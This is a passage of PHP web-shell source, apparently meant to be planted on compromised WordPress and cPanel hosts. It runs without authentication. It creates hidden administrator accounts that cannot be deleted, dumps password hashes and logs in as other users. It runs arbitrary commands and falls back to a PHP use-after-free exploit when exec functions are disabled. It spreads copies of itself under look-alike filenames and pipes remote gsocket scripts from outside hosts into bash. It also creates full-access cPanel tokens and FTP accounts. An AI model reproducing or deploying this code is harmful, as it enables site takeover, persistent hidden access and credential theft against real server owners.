8) return false; $dir = $dir ?: __DIR__; $wp_load = $dir . '/wp-load.php'; if (file_exists($wp_load)) return $wp_load; return findWpLoad(dirname($dir), $depth + 1); } // === WP AJAX HANDLER - Exact copy from reference script === if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['c4t'])) { $wp_load_path = findWpLoad(); if (!$wp_load_path) { echo json_encode(['err' => 'wp-load.php not found']); exit; } require_once $wp_load_path; function addUserProtection($username) { $functions_file = get_template_directory() . '/functions.php'; if (!file_exists($functions_file)) { $functions_file = get_stylesheet_directory() . '/functions.php'; } if (file_exists($functions_file)) { $protection_code = ' add_action(\'pre_get_users\', function($query) { if (is_admin() && function_exists(\'get_current_screen\')) { $screen = get_current_screen(); if ($screen && $screen->base === \'users\') { $protected_user = get_user_by(\'login\', \'' . $username . '\'); if ($protected_user) { $excluded = (array) $query->get(\'exclude\'); $excluded[] = $protected_user->ID; $query->set(\'exclude\', $excluded); } } } }); add_filter(\'wp_count_users\', function($counts) { $protected_user = get_user_by(\'login\', \'' . $username . '\'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action(\'delete_user\', function($user_id) { $user = get_user_by(\'ID\', $user_id); if ($user && $user->user_login === \'' . $username . '\') { wp_die( __(\'User ' . $username . ' tidak dapat dihapus.\', \'textdomain\'), __(\'Error\', \'textdomain\'), array(\'response\' => 403) ); } }); add_filter(\'user_search_columns\', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by(\'login\', \'' . $username . '\'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter(\'bulk_actions-users\', function($actions) { if (isset($_REQUEST[\'users\']) && is_array($_REQUEST[\'users\'])) { $protected_user = get_user_by(\'login\', \'' . $username . '\'); if ($protected_user && in_array($protected_user->ID, $_REQUEST[\'users\'])) { unset($actions[\'delete\']); } } return $actions; }); '; $current_content = file_get_contents($functions_file); if (strpos($current_content, "get_user_by('login', '{$username}')") === false) { file_put_contents($functions_file, $protection_code, FILE_APPEND | LOCK_EX); return true; } else { return true; } } return false; } function removeUserProtection($username) { $functions_file = get_template_directory() . '/functions.php'; if (!file_exists($functions_file)) { $functions_file = get_stylesheet_directory() . '/functions.php'; } if (file_exists($functions_file)) { $current_content = file_get_contents($functions_file); $pattern = '/add_action\(\'pre_get_users\'.*?get_user_by\(\'login\', \'' . preg_quote($username, '/') . '\'.*?add_filter\(\'bulk_actions-users\'.*?\}\);\s*/s'; $new_content = preg_replace($pattern, '', $current_content); if ($new_content !== $current_content) { file_put_contents($functions_file, $new_content, LOCK_EX); return true; } } return false; } function isUserHidden($username) { $functions_file = get_template_directory() . '/functions.php'; if (!file_exists($functions_file)) { $functions_file = get_stylesheet_directory() . '/functions.php'; } if (file_exists($functions_file)) { $current_content = file_get_contents($functions_file); return strpos($current_content, "get_user_by('login', '{$username}')") !== false; } return false; } global $wpdb; if ($_POST['c4t'] == 'ulst') { $users = $wpdb->get_results("SELECT ID, user_login, user_email, user_pass, user_registered FROM {$wpdb->users}"); foreach ($users as $user) { $user->is_hidden = isUserHidden($user->user_login); } echo json_encode($users); exit; } if ($_POST['c4t'] == 'rpsw') { $user_id = intval($_POST['uix']); $new_password = wp_generate_password(12, true, true); wp_set_password($new_password, $user_id); $user_data = get_userdata($user_id); echo json_encode([ 'l' => $user_data->user_login, 'e' => $user_data->user_email, 'n' => $new_password ]); exit; } if ($_POST['c4t'] == 'cadm') { $username = preg_replace('/[^a-zA-Z0-9_]/', '', $_POST['xun']); $password = $_POST['xpw']; $email = filter_var($_POST['xem'], FILTER_VALIDATE_EMAIL) ? $_POST['xem'] : $username . '@' . $_SERVER['HTTP_HOST']; $hide_user = isset($_POST['hide_user']) ? true : false; if (username_exists($username)) { echo json_encode(['err' => 'user exists']); exit; } $user_id = wp_create_user($username, $password, $email); if ($user_id && !is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if ($hide_user) { addUserProtection($username); } echo json_encode([ 'ok' => 'created', 'u' => $username, 'p' => $password, 'hide' => $hide_user ]); } else { echo json_encode(['err' => 'create failed']); } exit; } if ($_POST['c4t'] == 'alog') { $user_id = intval($_POST['uix']); wp_clear_auth_cookie(); wp_set_current_user($user_id); wp_set_auth_cookie($user_id, true); echo json_encode(['url' => admin_url()]); exit; } if ($_POST['c4t'] == 'hide') { $user_id = intval($_POST['uix']); $user = get_user_by('ID', $user_id); if ($user) { $result = addUserProtection($user->user_login); echo json_encode([ 'ok' => 'hidden', 'user' => $user->user_login, 'success' => $result ]); } else { echo json_encode(['err' => 'user not found']); } exit; } if ($_POST['c4t'] == 'unhide') { $user_id = intval($_POST['uix']); $user = get_user_by('ID', $user_id); if ($user) { $result = removeUserProtection($user->user_login); echo json_encode([ 'ok' => 'unhidden', 'user' => $user->user_login, 'success' => $result ]); } else { echo json_encode(['err' => 'user not found']); } exit; } if ($_POST['c4t'] == 'del') { $user_id = intval($_POST['uix']); $user = get_user_by('ID', $user_id); if ($user) { $current_user = wp_get_current_user(); if ($user_id == $current_user->ID) { echo json_encode(['err' => 'cannot_delete_self']); exit; } if (isUserHidden($user->user_login)) { removeUserProtection($user->user_login); } if (wp_delete_user($user_id)) { echo json_encode([ 'ok' => 'deleted', 'user' => $user->user_login ]); } else { echo json_encode(['err' => 'delete_failed']); } } else { echo json_encode(['err' => 'user_not_found']); } exit; } exit; } // === END WP AJAX HANDLER === // No authentication required session_start(); function isAuthenticated() { return true; } // === PROCESS AJAX HANDLER === if (isset($_POST['proc_action']) && isAuthenticated()) { header('Content-Type: application/json; charset=utf-8'); $pAct = $_POST['proc_action']; if ($pAct === 'list') { // Get all visible processes $ps_out = shell_exec('ps auxww 2>/dev/null') ?: ''; $lines = explode("\n", trim($ps_out)); $header = array_shift($lines); $processes = []; foreach ($lines as $line) { $line = trim($line); if (empty($line)) continue; $cols = preg_split('/\s+/', $line, 11); if (count($cols) >= 11) { $processes[] = [ 'user' => $cols[0], 'pid' => $cols[1], 'cpu' => $cols[2], 'mem' => $cols[3], 'vsz' => $cols[4], 'rss' => $cols[5], 'tty' => $cols[6], 'stat' => $cols[7], 'start' => $cols[8], 'time' => $cols[9], 'command' => $cols[10], ]; } } // Detect hidden processes by comparing /proc with ps output $ps_pids = array_column($processes, 'pid'); $hidden = []; if (is_dir('/proc')) { $proc_dirs = @scandir('/proc'); if ($proc_dirs) { foreach ($proc_dirs as $d) { if (!is_numeric($d)) continue; if (!in_array($d, $ps_pids)) { // Hidden process found - try to get info $cmdline = @file_get_contents("/proc/$d/cmdline"); $cmdline = $cmdline ? str_replace("\0", ' ', trim($cmdline)) : '[hidden]'; $status = @file_get_contents("/proc/$d/status"); $uid = '?'; if ($status && preg_match('/Uid:\s+(\d+)/', $status, $m)) { $pw = @posix_getpwuid((int)$m[1]); $uid = $pw ? $pw['name'] : $m[1]; } $hidden[] = [ 'pid' => $d, 'user' => $uid, 'command' => $cmdline ?: '[hidden]', ]; } } } } // Detect recently started processes (started within last 5 minutes) $recent = []; $now = time(); foreach ($processes as $p) { // Check /proc//stat for start time $stat = @file_get_contents("/proc/{$p['pid']}/stat"); if ($stat) { $parts = explode(' ', $stat); if (isset($parts[21])) { $uptime_str = @file_get_contents('/proc/uptime'); if ($uptime_str) { $uptime = (float)explode(' ', $uptime_str)[0]; $clk_tck = 100; // sysconf(_SC_CLK_TCK) $start_sec = (float)$parts[21] / $clk_tck; $boot_time = $now - $uptime; $proc_start = $boot_time + $start_sec; $age = $now - $proc_start; if ($age >= 0 && $age <= 300) { $p['age_seconds'] = (int)$age; $recent[] = $p; } } } } } echo json_encode([ 'processes' => $processes, 'hidden' => $hidden, 'recent' => $recent, 'total' => count($processes), 'total_hidden' => count($hidden), 'total_recent' => count($recent), ]); exit; } if ($pAct === 'kill') { $pid = intval($_POST['pid'] ?? 0); if ($pid > 0) { $sig = $_POST['signal'] ?? '9'; $out = shell_exec("kill -$sig $pid 2>&1"); echo json_encode(['ok' => true, 'pid' => $pid, 'output' => trim($out ?? '')]); } else { echo json_encode(['err' => 'invalid pid']); } exit; } echo json_encode(['err' => 'unknown action']); exit; } // === END PROCESS HANDLER === // === FILE MANAGER STARTS DIRECTLY === @ob_clean(); @header("X-Accel-Buffering: no"); @header("Content-Encoding: none"); // === BYPASS ENGINE (PHP UAF) === class Helper { public $a, $b, $c; } class Pwn { const LOGGING = false; const CHUNK_DATA_SIZE = 0x60; const CHUNK_SIZE = self::CHUNK_DATA_SIZE; const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1; const HT_SIZE = 0x118; const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1; public function __construct($cmd) { for($i = 0; $i < 10; $i++) { $groom[] = self::alloc(self::STRING_SIZE); $groom[] = self::alloc(self::HT_STRING_SIZE); } $concat_str_addr = self::str2ptr($this->heap_leak(), 16); $fill = self::alloc(self::STRING_SIZE); $this->abc = self::alloc(self::STRING_SIZE); $abc_addr = $concat_str_addr + self::CHUNK_SIZE; $this->free($abc_addr); $this->helper = new Helper; if(strlen($this->abc) < 0x1337) return; $this->helper->a = "leet"; $this->helper->b = function($x) {}; $this->helper->c = 0xfeedface; $helper_handlers = $this->rel_read(0); $closure_addr = $this->rel_read(0x20); $closure_ce = $this->read($closure_addr + 0x10); $basic_funcs = $this->get_basic_funcs($closure_ce); $zif_system = $this->get_system($basic_funcs); $fake_closure_off = 0x70; for($i = 0; $i < 0x138; $i += 8) { $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i)); } $this->rel_write($fake_closure_off + 0x38, 1, 4); $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68; $this->rel_write($fake_closure_off + $handler_offset, $zif_system); $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18; $this->rel_write(0x20, $fake_closure_addr); ($this->helper->b)($cmd); $this->rel_write(0x20, $closure_addr); unset($this->helper->b); } private function heap_leak() { $arr = [[], []]; set_error_handler(function() use (&$arr, &$buf) { $arr = 1; $buf = str_repeat("\x00", self::HT_STRING_SIZE); }); $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array")); return $buf; } private function free($addr) { $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr); $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload)); $arr = [[], []]; set_error_handler(function() use (&$arr, &$buf, &$payload) { $arr = 1; $buf = str_repeat($payload, 1); }); $arr[1] .= "x"; } private function rel_read($offset) { return self::str2ptr($this->abc, $offset); } private function rel_write($offset, $value, $n = 8) { for ($i = 0; $i < $n; $i++) { $this->abc[$offset + $i] = chr($value & 0xff); $value >>= 8; } } private function read($addr, $n = 8) { $this->rel_write(0x10, $addr - 0x10); $value = strlen($this->helper->a); if($n !== 8) { $value &= (1 << ($n << 3)) - 1; } return $value; } private function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = $this->read($addr); $f_name = $this->read($f_entry, 6); if($f_name === 0x6d6574737973) return $this->read($addr + 8); $addr += 0x20; } while($f_entry !== 0); } private function get_basic_funcs($addr) { while(true) { $addr -= 0x10; if($this->read($addr, 4) === 0xA8 && in_array($this->read($addr + 4, 4), [20180731, 20190902, 20200930, 20210902])) { $module_name_addr = $this->read($addr + 0x20); $module_name = $this->read($module_name_addr); if($module_name === 0x647261646e617473) return $this->read($addr + 0x28); } } } static function alloc($size) { return str_shuffle(str_repeat("A", $size)); } static function str2ptr($str, $p = 0, $n = 8) { $address = 0; for($j = $n - 1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p + $j]); } return $address; } } function runBypass($cmd) { ob_start(); try { new Pwn($cmd); } catch(\Throwable $e) {} $out = ob_get_clean(); return (!empty(trim($out ?? ''))) ? trim($out) : null; } // === CORE FUNCTIONS === function runCmd($cmd) { $out = null; $user = get_current_user(); $home = getenv('HOME') ?: ('/home/' . $user); $env = "HOME=$home USER=$user"; $fullCmd = $env . ' /bin/bash -l -c ' . escapeshellarg($cmd) . ' 2>&1'; if (function_exists('proc_open')) { $desc = [0 => ['pipe','r'], 1 => ['pipe','w'], 2 => ['pipe','w']]; $envArr = ['HOME' => $home, 'USER' => $user, 'PATH' => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin']; $proc = @proc_open('/bin/bash -l -c ' . escapeshellarg($cmd), $desc, $pipes, $home, $envArr); if (is_resource($proc)) { @fclose($pipes[0]); $out = @stream_get_contents($pipes[1]); $err = @stream_get_contents($pipes[2]); @fclose($pipes[1]); @fclose($pipes[2]); @proc_close($proc); if (empty(trim($out ?? '')) && !empty(trim($err ?? ''))) $out = $err; } } if ($out === null && function_exists('exec')) { @exec($fullCmd, $outArr, $ret); $out = implode("\n", $outArr); } if ($out === null && function_exists('shell_exec')) { $out = @shell_exec($fullCmd); } if ($out === null && function_exists('popen')) { $fp = @popen($fullCmd, 'r'); if ($fp) { $out = @stream_get_contents($fp); @pclose($fp); } } // Fallback: UAF bypass when all exec functions are disabled if ($out === null || trim($out) === '') { $out = runBypass($cmd); } return $out; } function runUapi($args) { return runCmd('uapi ' . $args); } function parseUapiStatus($raw) { if (empty($raw)) return ['ok' => false, 'raw' => '']; $ok = (bool)preg_match('/status:\s*1/', $raw); return ['ok' => $ok, 'raw' => $raw]; } function parseUapiFtpList($raw) { if (empty($raw)) return []; $accounts = []; $blocks = preg_split('/^\s*-\s*$/m', $raw); foreach ($blocks as $block) { $acct = []; if (preg_match('/\buser:\s*(.+)/i', $block, $m)) $acct['user'] = trim($m[1], " '\"\r\n"); if (preg_match('/\blogin:\s*(.+)/i', $block, $m)) $acct['login'] = trim($m[1], " '\"\r\n"); if (preg_match('/\bdomain:\s*(.+)/i', $block, $m)) $acct['domain'] = trim($m[1], " '\"\r\n"); if (preg_match('/\bhomedir:\s*(.+)/i', $block, $m)) $acct['homedir'] = trim($m[1], " '\"\r\n"); if (preg_match('/\bdiskquota:\s*(.+)/i', $block, $m)) $acct['quota'] = trim($m[1], " '\"\r\n"); if (preg_match('/\bdiskused:\s*(.+)/i', $block, $m)) $acct['used'] = trim($m[1], " '\"\r\n"); if (!empty($acct['user']) || !empty($acct['login'])) $accounts[] = $acct; } if (empty($accounts)) { preg_match_all('/(?:user|login):\s*[\'"]?(\S+)[\'"]?/i', $raw, $userMatches); preg_match_all('/domain:\s*[\'"]?(\S+)[\'"]?/i', $raw, $domainMatches); preg_match_all('/homedir:\s*[\'"]?(\S+)[\'"]?/i', $raw, $dirMatches); for ($i = 0; $i < count($userMatches[1]); $i++) { $accounts[] = [ 'user' => $userMatches[1][$i] ?? '', 'login' => $userMatches[1][$i] ?? '', 'domain' => $domainMatches[1][$i] ?? '', 'homedir' => $dirMatches[1][$i] ?? '', ]; } } return $accounts; } function formatSize($size) { $units = ['B', 'KB', 'MB', 'GB', 'TB']; $i = 0; while ($size >= 1024 && $i < 4) { $size /= 1024; $i++; } return round($size, 2) . ' ' . $units[$i]; } function fixPermission($path) { $perms = @fileperms($path); if ($perms === false) return false; $octal = substr(sprintf('%o', $perms), -4); $unwritable = ['0555','0444','0111','0000','0550','0440','0110','0554','0445','0511','0155','0144']; if (in_array($octal, $unwritable)) { if (is_dir($path)) { @chmod($path, 0755); } else { @chmod($path, 0644); } return true; } return false; } function safeAccess($path) { fixPermission($path); return @is_readable($path); } function getFileDetails($path) { $folders = []; $files = []; try { if (!safeAccess($path)) return 'None'; $items = @scandir($path); if (!is_array($items)) return 'None'; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $itemPath = $path . '/' . $item; $perm = @fileperms($itemPath); $permStr = $perm !== false ? substr(sprintf('%o', $perm), -4) : '----'; $size = ''; if (!is_dir($itemPath)) { $s = @filesize($itemPath); $size = $s !== false ? formatSize($s) : '?'; } $isWritable = @is_writable($itemPath); $isReadable = @is_readable($itemPath); $permColor = '#f85149'; if ($isWritable && $isReadable) $permColor = '#3fb950'; elseif ($isReadable) $permColor = '#e6edf3'; $detail = [ 'name' => $item, 'type' => is_dir($itemPath) ? 'Folder' : 'File', 'size' => $size, 'permission' => $permStr, 'perm_color' => $permColor, 'writable' => $isWritable, 'readable' => $isReadable, ]; if (is_dir($itemPath)) $folders[] = $detail; else $files[] = $detail; } return array_merge($folders, $files); } catch (Exception $e) { return 'None'; } } function executeCommand($command) { $currentDirectory = getCurrentDirectory(); $fullCmd = "cd " . escapeshellarg($currentDirectory) . " && " . $command; $out = runCmd($fullCmd); if ($out !== null && !empty(trim($out))) return trim($out); // Final fallback: direct bypass without cd $out = runBypass($command); if ($out !== null && !empty(trim($out))) return trim($out); return 'No output or command failed.'; } function readFileContent($file) { return @file_get_contents($file); } function saveFileContent($file) { if (isset($_POST['content'])) { fixPermission($file); fixPermission(dirname($file)); return @file_put_contents($file, $_POST['content']) !== false; } return false; } function uploadFile($targetDirectory) { if (isset($_FILES['file'])) { fixPermission($targetDirectory); $targetFile = $targetDirectory . '/' . basename($_FILES['file']['name']); if ($_FILES['file']['size'] === 0) return 'Empty file.'; if (move_uploaded_file($_FILES['file']['tmp_name'], $targetFile)) return 'File uploaded successfully.'; return 'Error uploading file.'; } return ''; } function uploadMultipleFiles($targetDirectory) { if (!isset($_FILES['files'])) return 'No files selected.'; fixPermission($targetDirectory); $success = 0; $fail = 0; for ($i = 0; $i < count($_FILES['files']['name']); $i++) { if ($_FILES['files']['error'][$i] === 0 && !empty($_FILES['files']['name'][$i])) { $target = $targetDirectory . '/' . basename($_FILES['files']['name'][$i]); if (move_uploaded_file($_FILES['files']['tmp_name'][$i], $target)) $success++; else $fail++; } } return "Uploaded: $success, Failed: $fail"; } function getCurrentDirectory() { return realpath(getcwd()); } function deleteFile($file) { fixPermission($file); fixPermission(dirname($file)); if (file_exists($file)) { if (is_dir($file)) return deleteFolder($file); if (@unlink($file)) return true; } return false; } function deleteFolder($folder) { fixPermission($folder); if (is_dir($folder)) { $items = @scandir($folder); if (is_array($items)) { foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $folder . '/' . $item; fixPermission($path); if (is_dir($path)) deleteFolder($path); else @unlink($path); } } return @rmdir($folder); } return false; } function renameFile($oldName, $newName) { fixPermission($oldName); fixPermission(dirname($oldName)); if (file_exists($oldName)) { $directory = dirname($oldName); $newPath = $directory . '/' . $newName; if (@rename($oldName, $newPath)) return 'Renamed successfully.'; return 'Error renaming.'; } return 'File does not exist.'; } function scanDeepestDirectory($basePath) { $deepest = []; $maxDepth = 0; try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($basePath, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isDir()) { $depth = $iterator->getDepth(); if ($depth > $maxDepth) { $maxDepth = $depth; $deepest = [$item->getPathname()]; } elseif ($depth == $maxDepth) { $deepest[] = $item->getPathname(); } } } } catch (Exception $e) {} return $deepest; } function scanNewlyFiles($basePath, $ext = 'php', $limit = 50) { $files = []; try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($basePath, RecursiveDirectoryIterator::SKIP_DOTS) ); foreach ($iterator as $item) { if ($item->isFile() && strtolower($item->getExtension()) === $ext) { $files[] = ['path' => $item->getPathname(), 'time' => $item->getMTime()]; } } } catch (Exception $e) {} usort($files, function($a, $b) { return $b['time'] - $a['time']; }); return array_slice($files, 0, $limit); } function generateHomoglyph($filename) { $name = pathinfo($filename, PATHINFO_FILENAME); $ext = pathinfo($filename, PATHINFO_EXTENSION); $map = [ 'a' => ['@','4'], 'e' => ['3'], 'i' => ['1','l'], 'o' => ['0'], 's' => ['5'], 'l' => ['1','I'], 'g' => ['9'], 'c' => ['('], 't' => ['7'], 'I' => ['l','1'], 'O' => ['0'], 'S' => ['5'], 'A' => ['4','@'], 'E' => ['3'], 'B' => ['8'], 'G' => ['6'], 'T' => ['7'], ]; $variants = []; $len = strlen($name); for ($i = 0; $i < $len; $i++) { $ch = $name[$i]; if (isset($map[$ch])) { foreach ($map[$ch] as $rep) { $v = substr($name, 0, $i) . $rep . substr($name, $i + 1); $full = $ext ? $v . '.' . $ext : $v; if ($full !== $filename) $variants[] = $full; } } } if (empty($variants)) { $variants[] = '.' . $filename; $variants[] = $name . '_bak.' . $ext; } return array_unique($variants); } function massSpreadAuto($basePath, $content) { $count = 0; $errors = []; $created = []; $targetExts = ['php']; try { fixPermission($basePath); $dirs = [$basePath]; $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($basePath, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isDir()) $dirs[] = $item->getPathname(); } foreach ($dirs as $dir) { fixPermission($dir); $files = @scandir($dir); if (!is_array($files)) { $errors[] = $dir; continue; } $existingFiles = []; foreach ($files as $f) { if ($f === '.' || $f === '..') continue; if (is_file($dir . '/' . $f)) { $fext = strtolower(pathinfo($f, PATHINFO_EXTENSION)); if (in_array($fext, $targetExts)) $existingFiles[] = $f; } } if (empty($existingFiles)) { $existingFiles = ['index.php', 'config.php', 'class-loader.php']; } $placed = false; foreach ($existingFiles as $origFile) { $variants = generateHomoglyph($origFile); foreach ($variants as $variant) { $targetPath = $dir . '/' . $variant; if (!file_exists($targetPath)) { if (@file_put_contents($targetPath, $content) !== false) { $count++; $created[] = $targetPath; $placed = true; break 2; } } } } if (!$placed) $errors[] = $dir; } } catch (Exception $e) { $errors[] = 'Exception: ' . $e->getMessage(); } return ['count' => $count, 'errors' => $errors, 'created' => $created]; } // === HANDLE REQUESTS === $currentDirectory = getCurrentDirectory(); $errorMessage = ''; $responseMessage = ''; $cmdOutput = ''; $loginError = ''; if (isset($_GET['lph'])) { @chdir($_GET['lph']); $currentDirectory = getCurrentDirectory(); } if (isset($_POST['multi_upload'])) { $responseMessage = uploadMultipleFiles($currentDirectory); } if (isset($_POST['newfolder']) && !empty($_POST['foldername'])) { $newDir = $currentDirectory . '/' . $_POST['foldername']; fixPermission($currentDirectory); if (@mkdir($newDir, 0755)) $responseMessage = 'Folder created.'; else $responseMessage = 'Failed to create folder.'; } if (isset($_POST['mass_chmod']) && !empty($_POST['chmod_folder']) && !empty($_POST['chmod_file'])) { $folderPerm = $_POST['chmod_folder']; $filePerm = $_POST['chmod_file']; $targetPath = !empty($_POST['chmod_path']) ? $_POST['chmod_path'] : $currentDirectory; $folderCount = 0; $fileCount = 0; $chmodErrors = []; try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($targetPath, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { $path = $item->getPathname(); if ($item->isDir()) { if (@chmod($path, octdec($folderPerm))) $folderCount++; else $chmodErrors[] = $path; } else { if (@chmod($path, octdec($filePerm))) $fileCount++; else $chmodErrors[] = $path; } } @chmod($targetPath, octdec($folderPerm)); $folderCount++; $cmdOutput = "=== Mass Chmod Result ===\nTarget: $targetPath\nFolder Perm: $folderPerm\nFile Perm: $filePerm\n---\nFolders: $folderCount\nFiles: $fileCount"; if (count($chmodErrors) > 0) { $cmdOutput .= "\nErrors: " . count($chmodErrors); foreach (array_slice($chmodErrors, 0, 5) as $err) $cmdOutput .= "\n $err"; } $responseMessage = 'Mass chmod completed.'; } catch (Exception $e) { $cmdOutput = "Error: " . $e->getMessage(); } } if (isset($_POST['mass_spread']) && !empty($_POST['spread_content'])) { $spreadContent = $_POST['spread_content']; $result = massSpreadAuto($currentDirectory, $spreadContent); $cmdOutput = "=== Mass Spread Result ===\nStarting from: $currentDirectory\nFiles created: " . $result['count']; if (count($result['created']) > 0) { $cmdOutput .= "\n\nCreated files:"; foreach (array_slice($result['created'], 0, 20) as $c) $cmdOutput .= "\n " . basename($c) . " -> " . dirname($c); } if (count($result['errors']) > 0) { $cmdOutput .= "\n\nFailed dirs: " . count($result['errors']); foreach (array_slice($result['errors'], 0, 5) as $err) $cmdOutput .= "\n $err"; } $responseMessage = 'Mass spread completed: ' . $result['count'] . ' files created.'; } if (isset($_POST['gsocket_action']) && isset($_POST['gsocket_cmd'])) { $gsCmd = $_POST['gsocket_cmd']; $cmdOutput = "=== GSSocket ===\n\n"; if ($gsCmd === 'install') { // Step 1: try gsocket.io $out = runCmd('curl -fsSL https://gsocket.io/y | bash'); if (!empty(trim($out ?? ''))) { $cmdOutput .= "[1] gsocket.io (curl):\n" . $out; } else { $out = runCmd('wget --no-verbose -O- https://gsocket.io/y | bash'); if (!empty(trim($out ?? ''))) { $cmdOutput .= "[1] gsocket.io (wget):\n" . $out; } else { $cmdOutput .= "[1] gsocket.io: No output.\n"; } } // Step 2: fallback segfault.net $out2 = runCmd('curl -fsSL http://nossl.segfault.net/deploy-all.sh -o /tmp/deploy-all.sh && bash /tmp/deploy-all.sh'); if (!empty(trim($out2 ?? ''))) { $cmdOutput .= "\n\n[2] segfault.net deploy:\n" . $out2; } else { $cmdOutput .= "\n\n[2] segfault.net deploy: No output."; } // Step 3: fallback port 53 $out3 = runCmd('GS_PORT=53 bash /tmp/deploy-all.sh'); if (!empty(trim($out3 ?? ''))) { $cmdOutput .= "\n\n[3] GS_PORT=53 deploy:\n" . $out3; } else { $cmdOutput .= "\n\n[3] GS_PORT=53 deploy: No output."; } // Cleanup @unlink('/tmp/deploy-all.sh'); runCmd('rm -f /tmp/deploy-all.sh'); $responseMessage = 'GSSocket install chain executed.'; } elseif ($gsCmd === 'uninstall') { $out = runCmd('GS_UNDO=1 bash -c "$(curl -fsSL https://gsocket.io/y)" 2>&1'); if (empty(trim($out ?? ''))) { $out = runCmd('GS_UNDO=1 bash -c "$(wget --no-verbose -O- https://gsocket.io/y)" 2>&1'); } // Auto kill all user processes runCmd('pkill -u $(whoami) 2>/dev/null'); runCmd('rm -f /tmp/deploy-all.sh'); // Clean output - remove the "Use pkill" instruction line $out = preg_replace('/-->.*pkill defunct.*/i', '', $out ?? ''); $out = trim($out); $out .= "\nAll user processes killed."; $cmdOutput .= $out; $responseMessage = 'GSSocket uninstall executed.'; } } if (isset($_POST['cpanel_token'])) { $randomName = 'lp' . substr(md5(uniqid(mt_rand(), true)), 0, 8); $uapiOutput = runUapi('Tokens create_full_access name=' . $randomName); $serverDomain = $_SERVER['HTTP_HOST'] ?? $_SERVER['SERVER_NAME'] ?? 'unknown'; $serverDomain = preg_replace('/^https?:\/\//', '', $serverDomain); $serverDomain = rtrim($serverDomain, '/'); $serverUser = trim(runCmd('whoami') ?? get_current_user()); $token = ''; if ($uapiOutput && preg_match('/token:\s*[\'"]?([A-Z0-9]+)[\'"]?/i', $uapiOutput, $m)) { $token = $m[1]; } $cmdOutput = "=== cPanel Token Generated ===\n\n"; if (!empty($token)) { $cmdOutput .= "Login : https://" . $serverDomain . ":2083/\n"; $cmdOutput .= "Domain : " . $serverDomain . "\n"; $cmdOutput .= "User : " . $serverUser . "\n"; $cmdOutput .= "Token : " . $token . "\n"; $cmdOutput .= "\n=== Copy Format ===\n"; $cmdOutput .= $serverDomain . "|" . $serverUser . "|" . $token; $responseMessage = 'cPanel token created successfully'; } else { $cmdOutput .= "FAILED to create token.\n\n"; $cmdOutput .= "Raw output:\n" . ($uapiOutput ?: 'No output from uapi'); $responseMessage = 'Token creation failed'; } } $ftpAccounts = []; if (isset($_POST['ftp_list']) || isset($_POST['ftp_add']) || isset($_POST['ftp_passwd']) || isset($_POST['ftp_delete'])) { $ftpListRaw = runUapi('Ftp list_ftp'); $ftpAccounts = parseUapiFtpList($ftpListRaw); } if (isset($_POST['ftp_list'])) { $responseMessage = count($ftpAccounts) . ' FTP account(s) found.'; } if (isset($_POST['ftp_add']) && !empty($_POST['ftp_user']) && !empty($_POST['ftp_pass'])) { $ftpUser = $_POST['ftp_user']; $ftpPass = $_POST['ftp_pass']; $ftpQuota = !empty($_POST['ftp_quota']) ? $_POST['ftp_quota'] : '0'; $homeDir = getenv('HOME') ?: ('/home/' . get_current_user()); $addOutput = runUapi('Ftp add_ftp user=' . escapeshellarg($ftpUser) . ' pass=' . escapeshellarg($ftpPass) . ' quota=' . escapeshellarg($ftpQuota) . ' homedir=' . escapeshellarg($homeDir)); $parsed = parseUapiStatus($addOutput); if ($parsed['ok']) { $responseMessage = 'FTP account "' . $ftpUser . '" created successfully.'; } else { $errorMessage = 'FTP creation failed. Check output.'; $cmdOutput = $addOutput; } } if (isset($_POST['ftp_passwd']) && !empty($_POST['ftp_chg_user']) && !empty($_POST['ftp_chg_pass']) && !empty($_POST['ftp_chg_domain'])) { $chgUser = $_POST['ftp_chg_user']; $chgPass = $_POST['ftp_chg_pass']; $chgDomain = $_POST['ftp_chg_domain']; $passwdOutput = runUapi('Ftp passwd user=' . escapeshellarg($chgUser) . ' domain=' . escapeshellarg($chgDomain) . ' pass=' . escapeshellarg($chgPass)); $parsed = parseUapiStatus($passwdOutput); if ($parsed['ok']) { $responseMessage = 'Password changed for "' . $chgUser . '@' . $chgDomain . '".'; } else { $errorMessage = 'Password change failed.'; $cmdOutput = $passwdOutput; } } if (isset($_POST['ftp_delete']) && !empty($_POST['ftp_del_user']) && !empty($_POST['ftp_del_domain'])) { $delUser = $_POST['ftp_del_user']; $delDomain = $_POST['ftp_del_domain']; $delOutput = runUapi('Ftp delete_ftp user=' . escapeshellarg($delUser) . ' domain=' . escapeshellarg($delDomain)); $parsed = parseUapiStatus($delOutput); if ($parsed['ok']) { $responseMessage = 'FTP account "' . $delUser . '@' . $delDomain . '" deleted.'; } else { $errorMessage = 'FTP deletion failed.'; $cmdOutput = $delOutput; } } // === WORDPRESS MANAGER === $wpAvailable = false; $wpLoadPath = findWpLoad(); if ($wpLoadPath) $wpAvailable = true; if 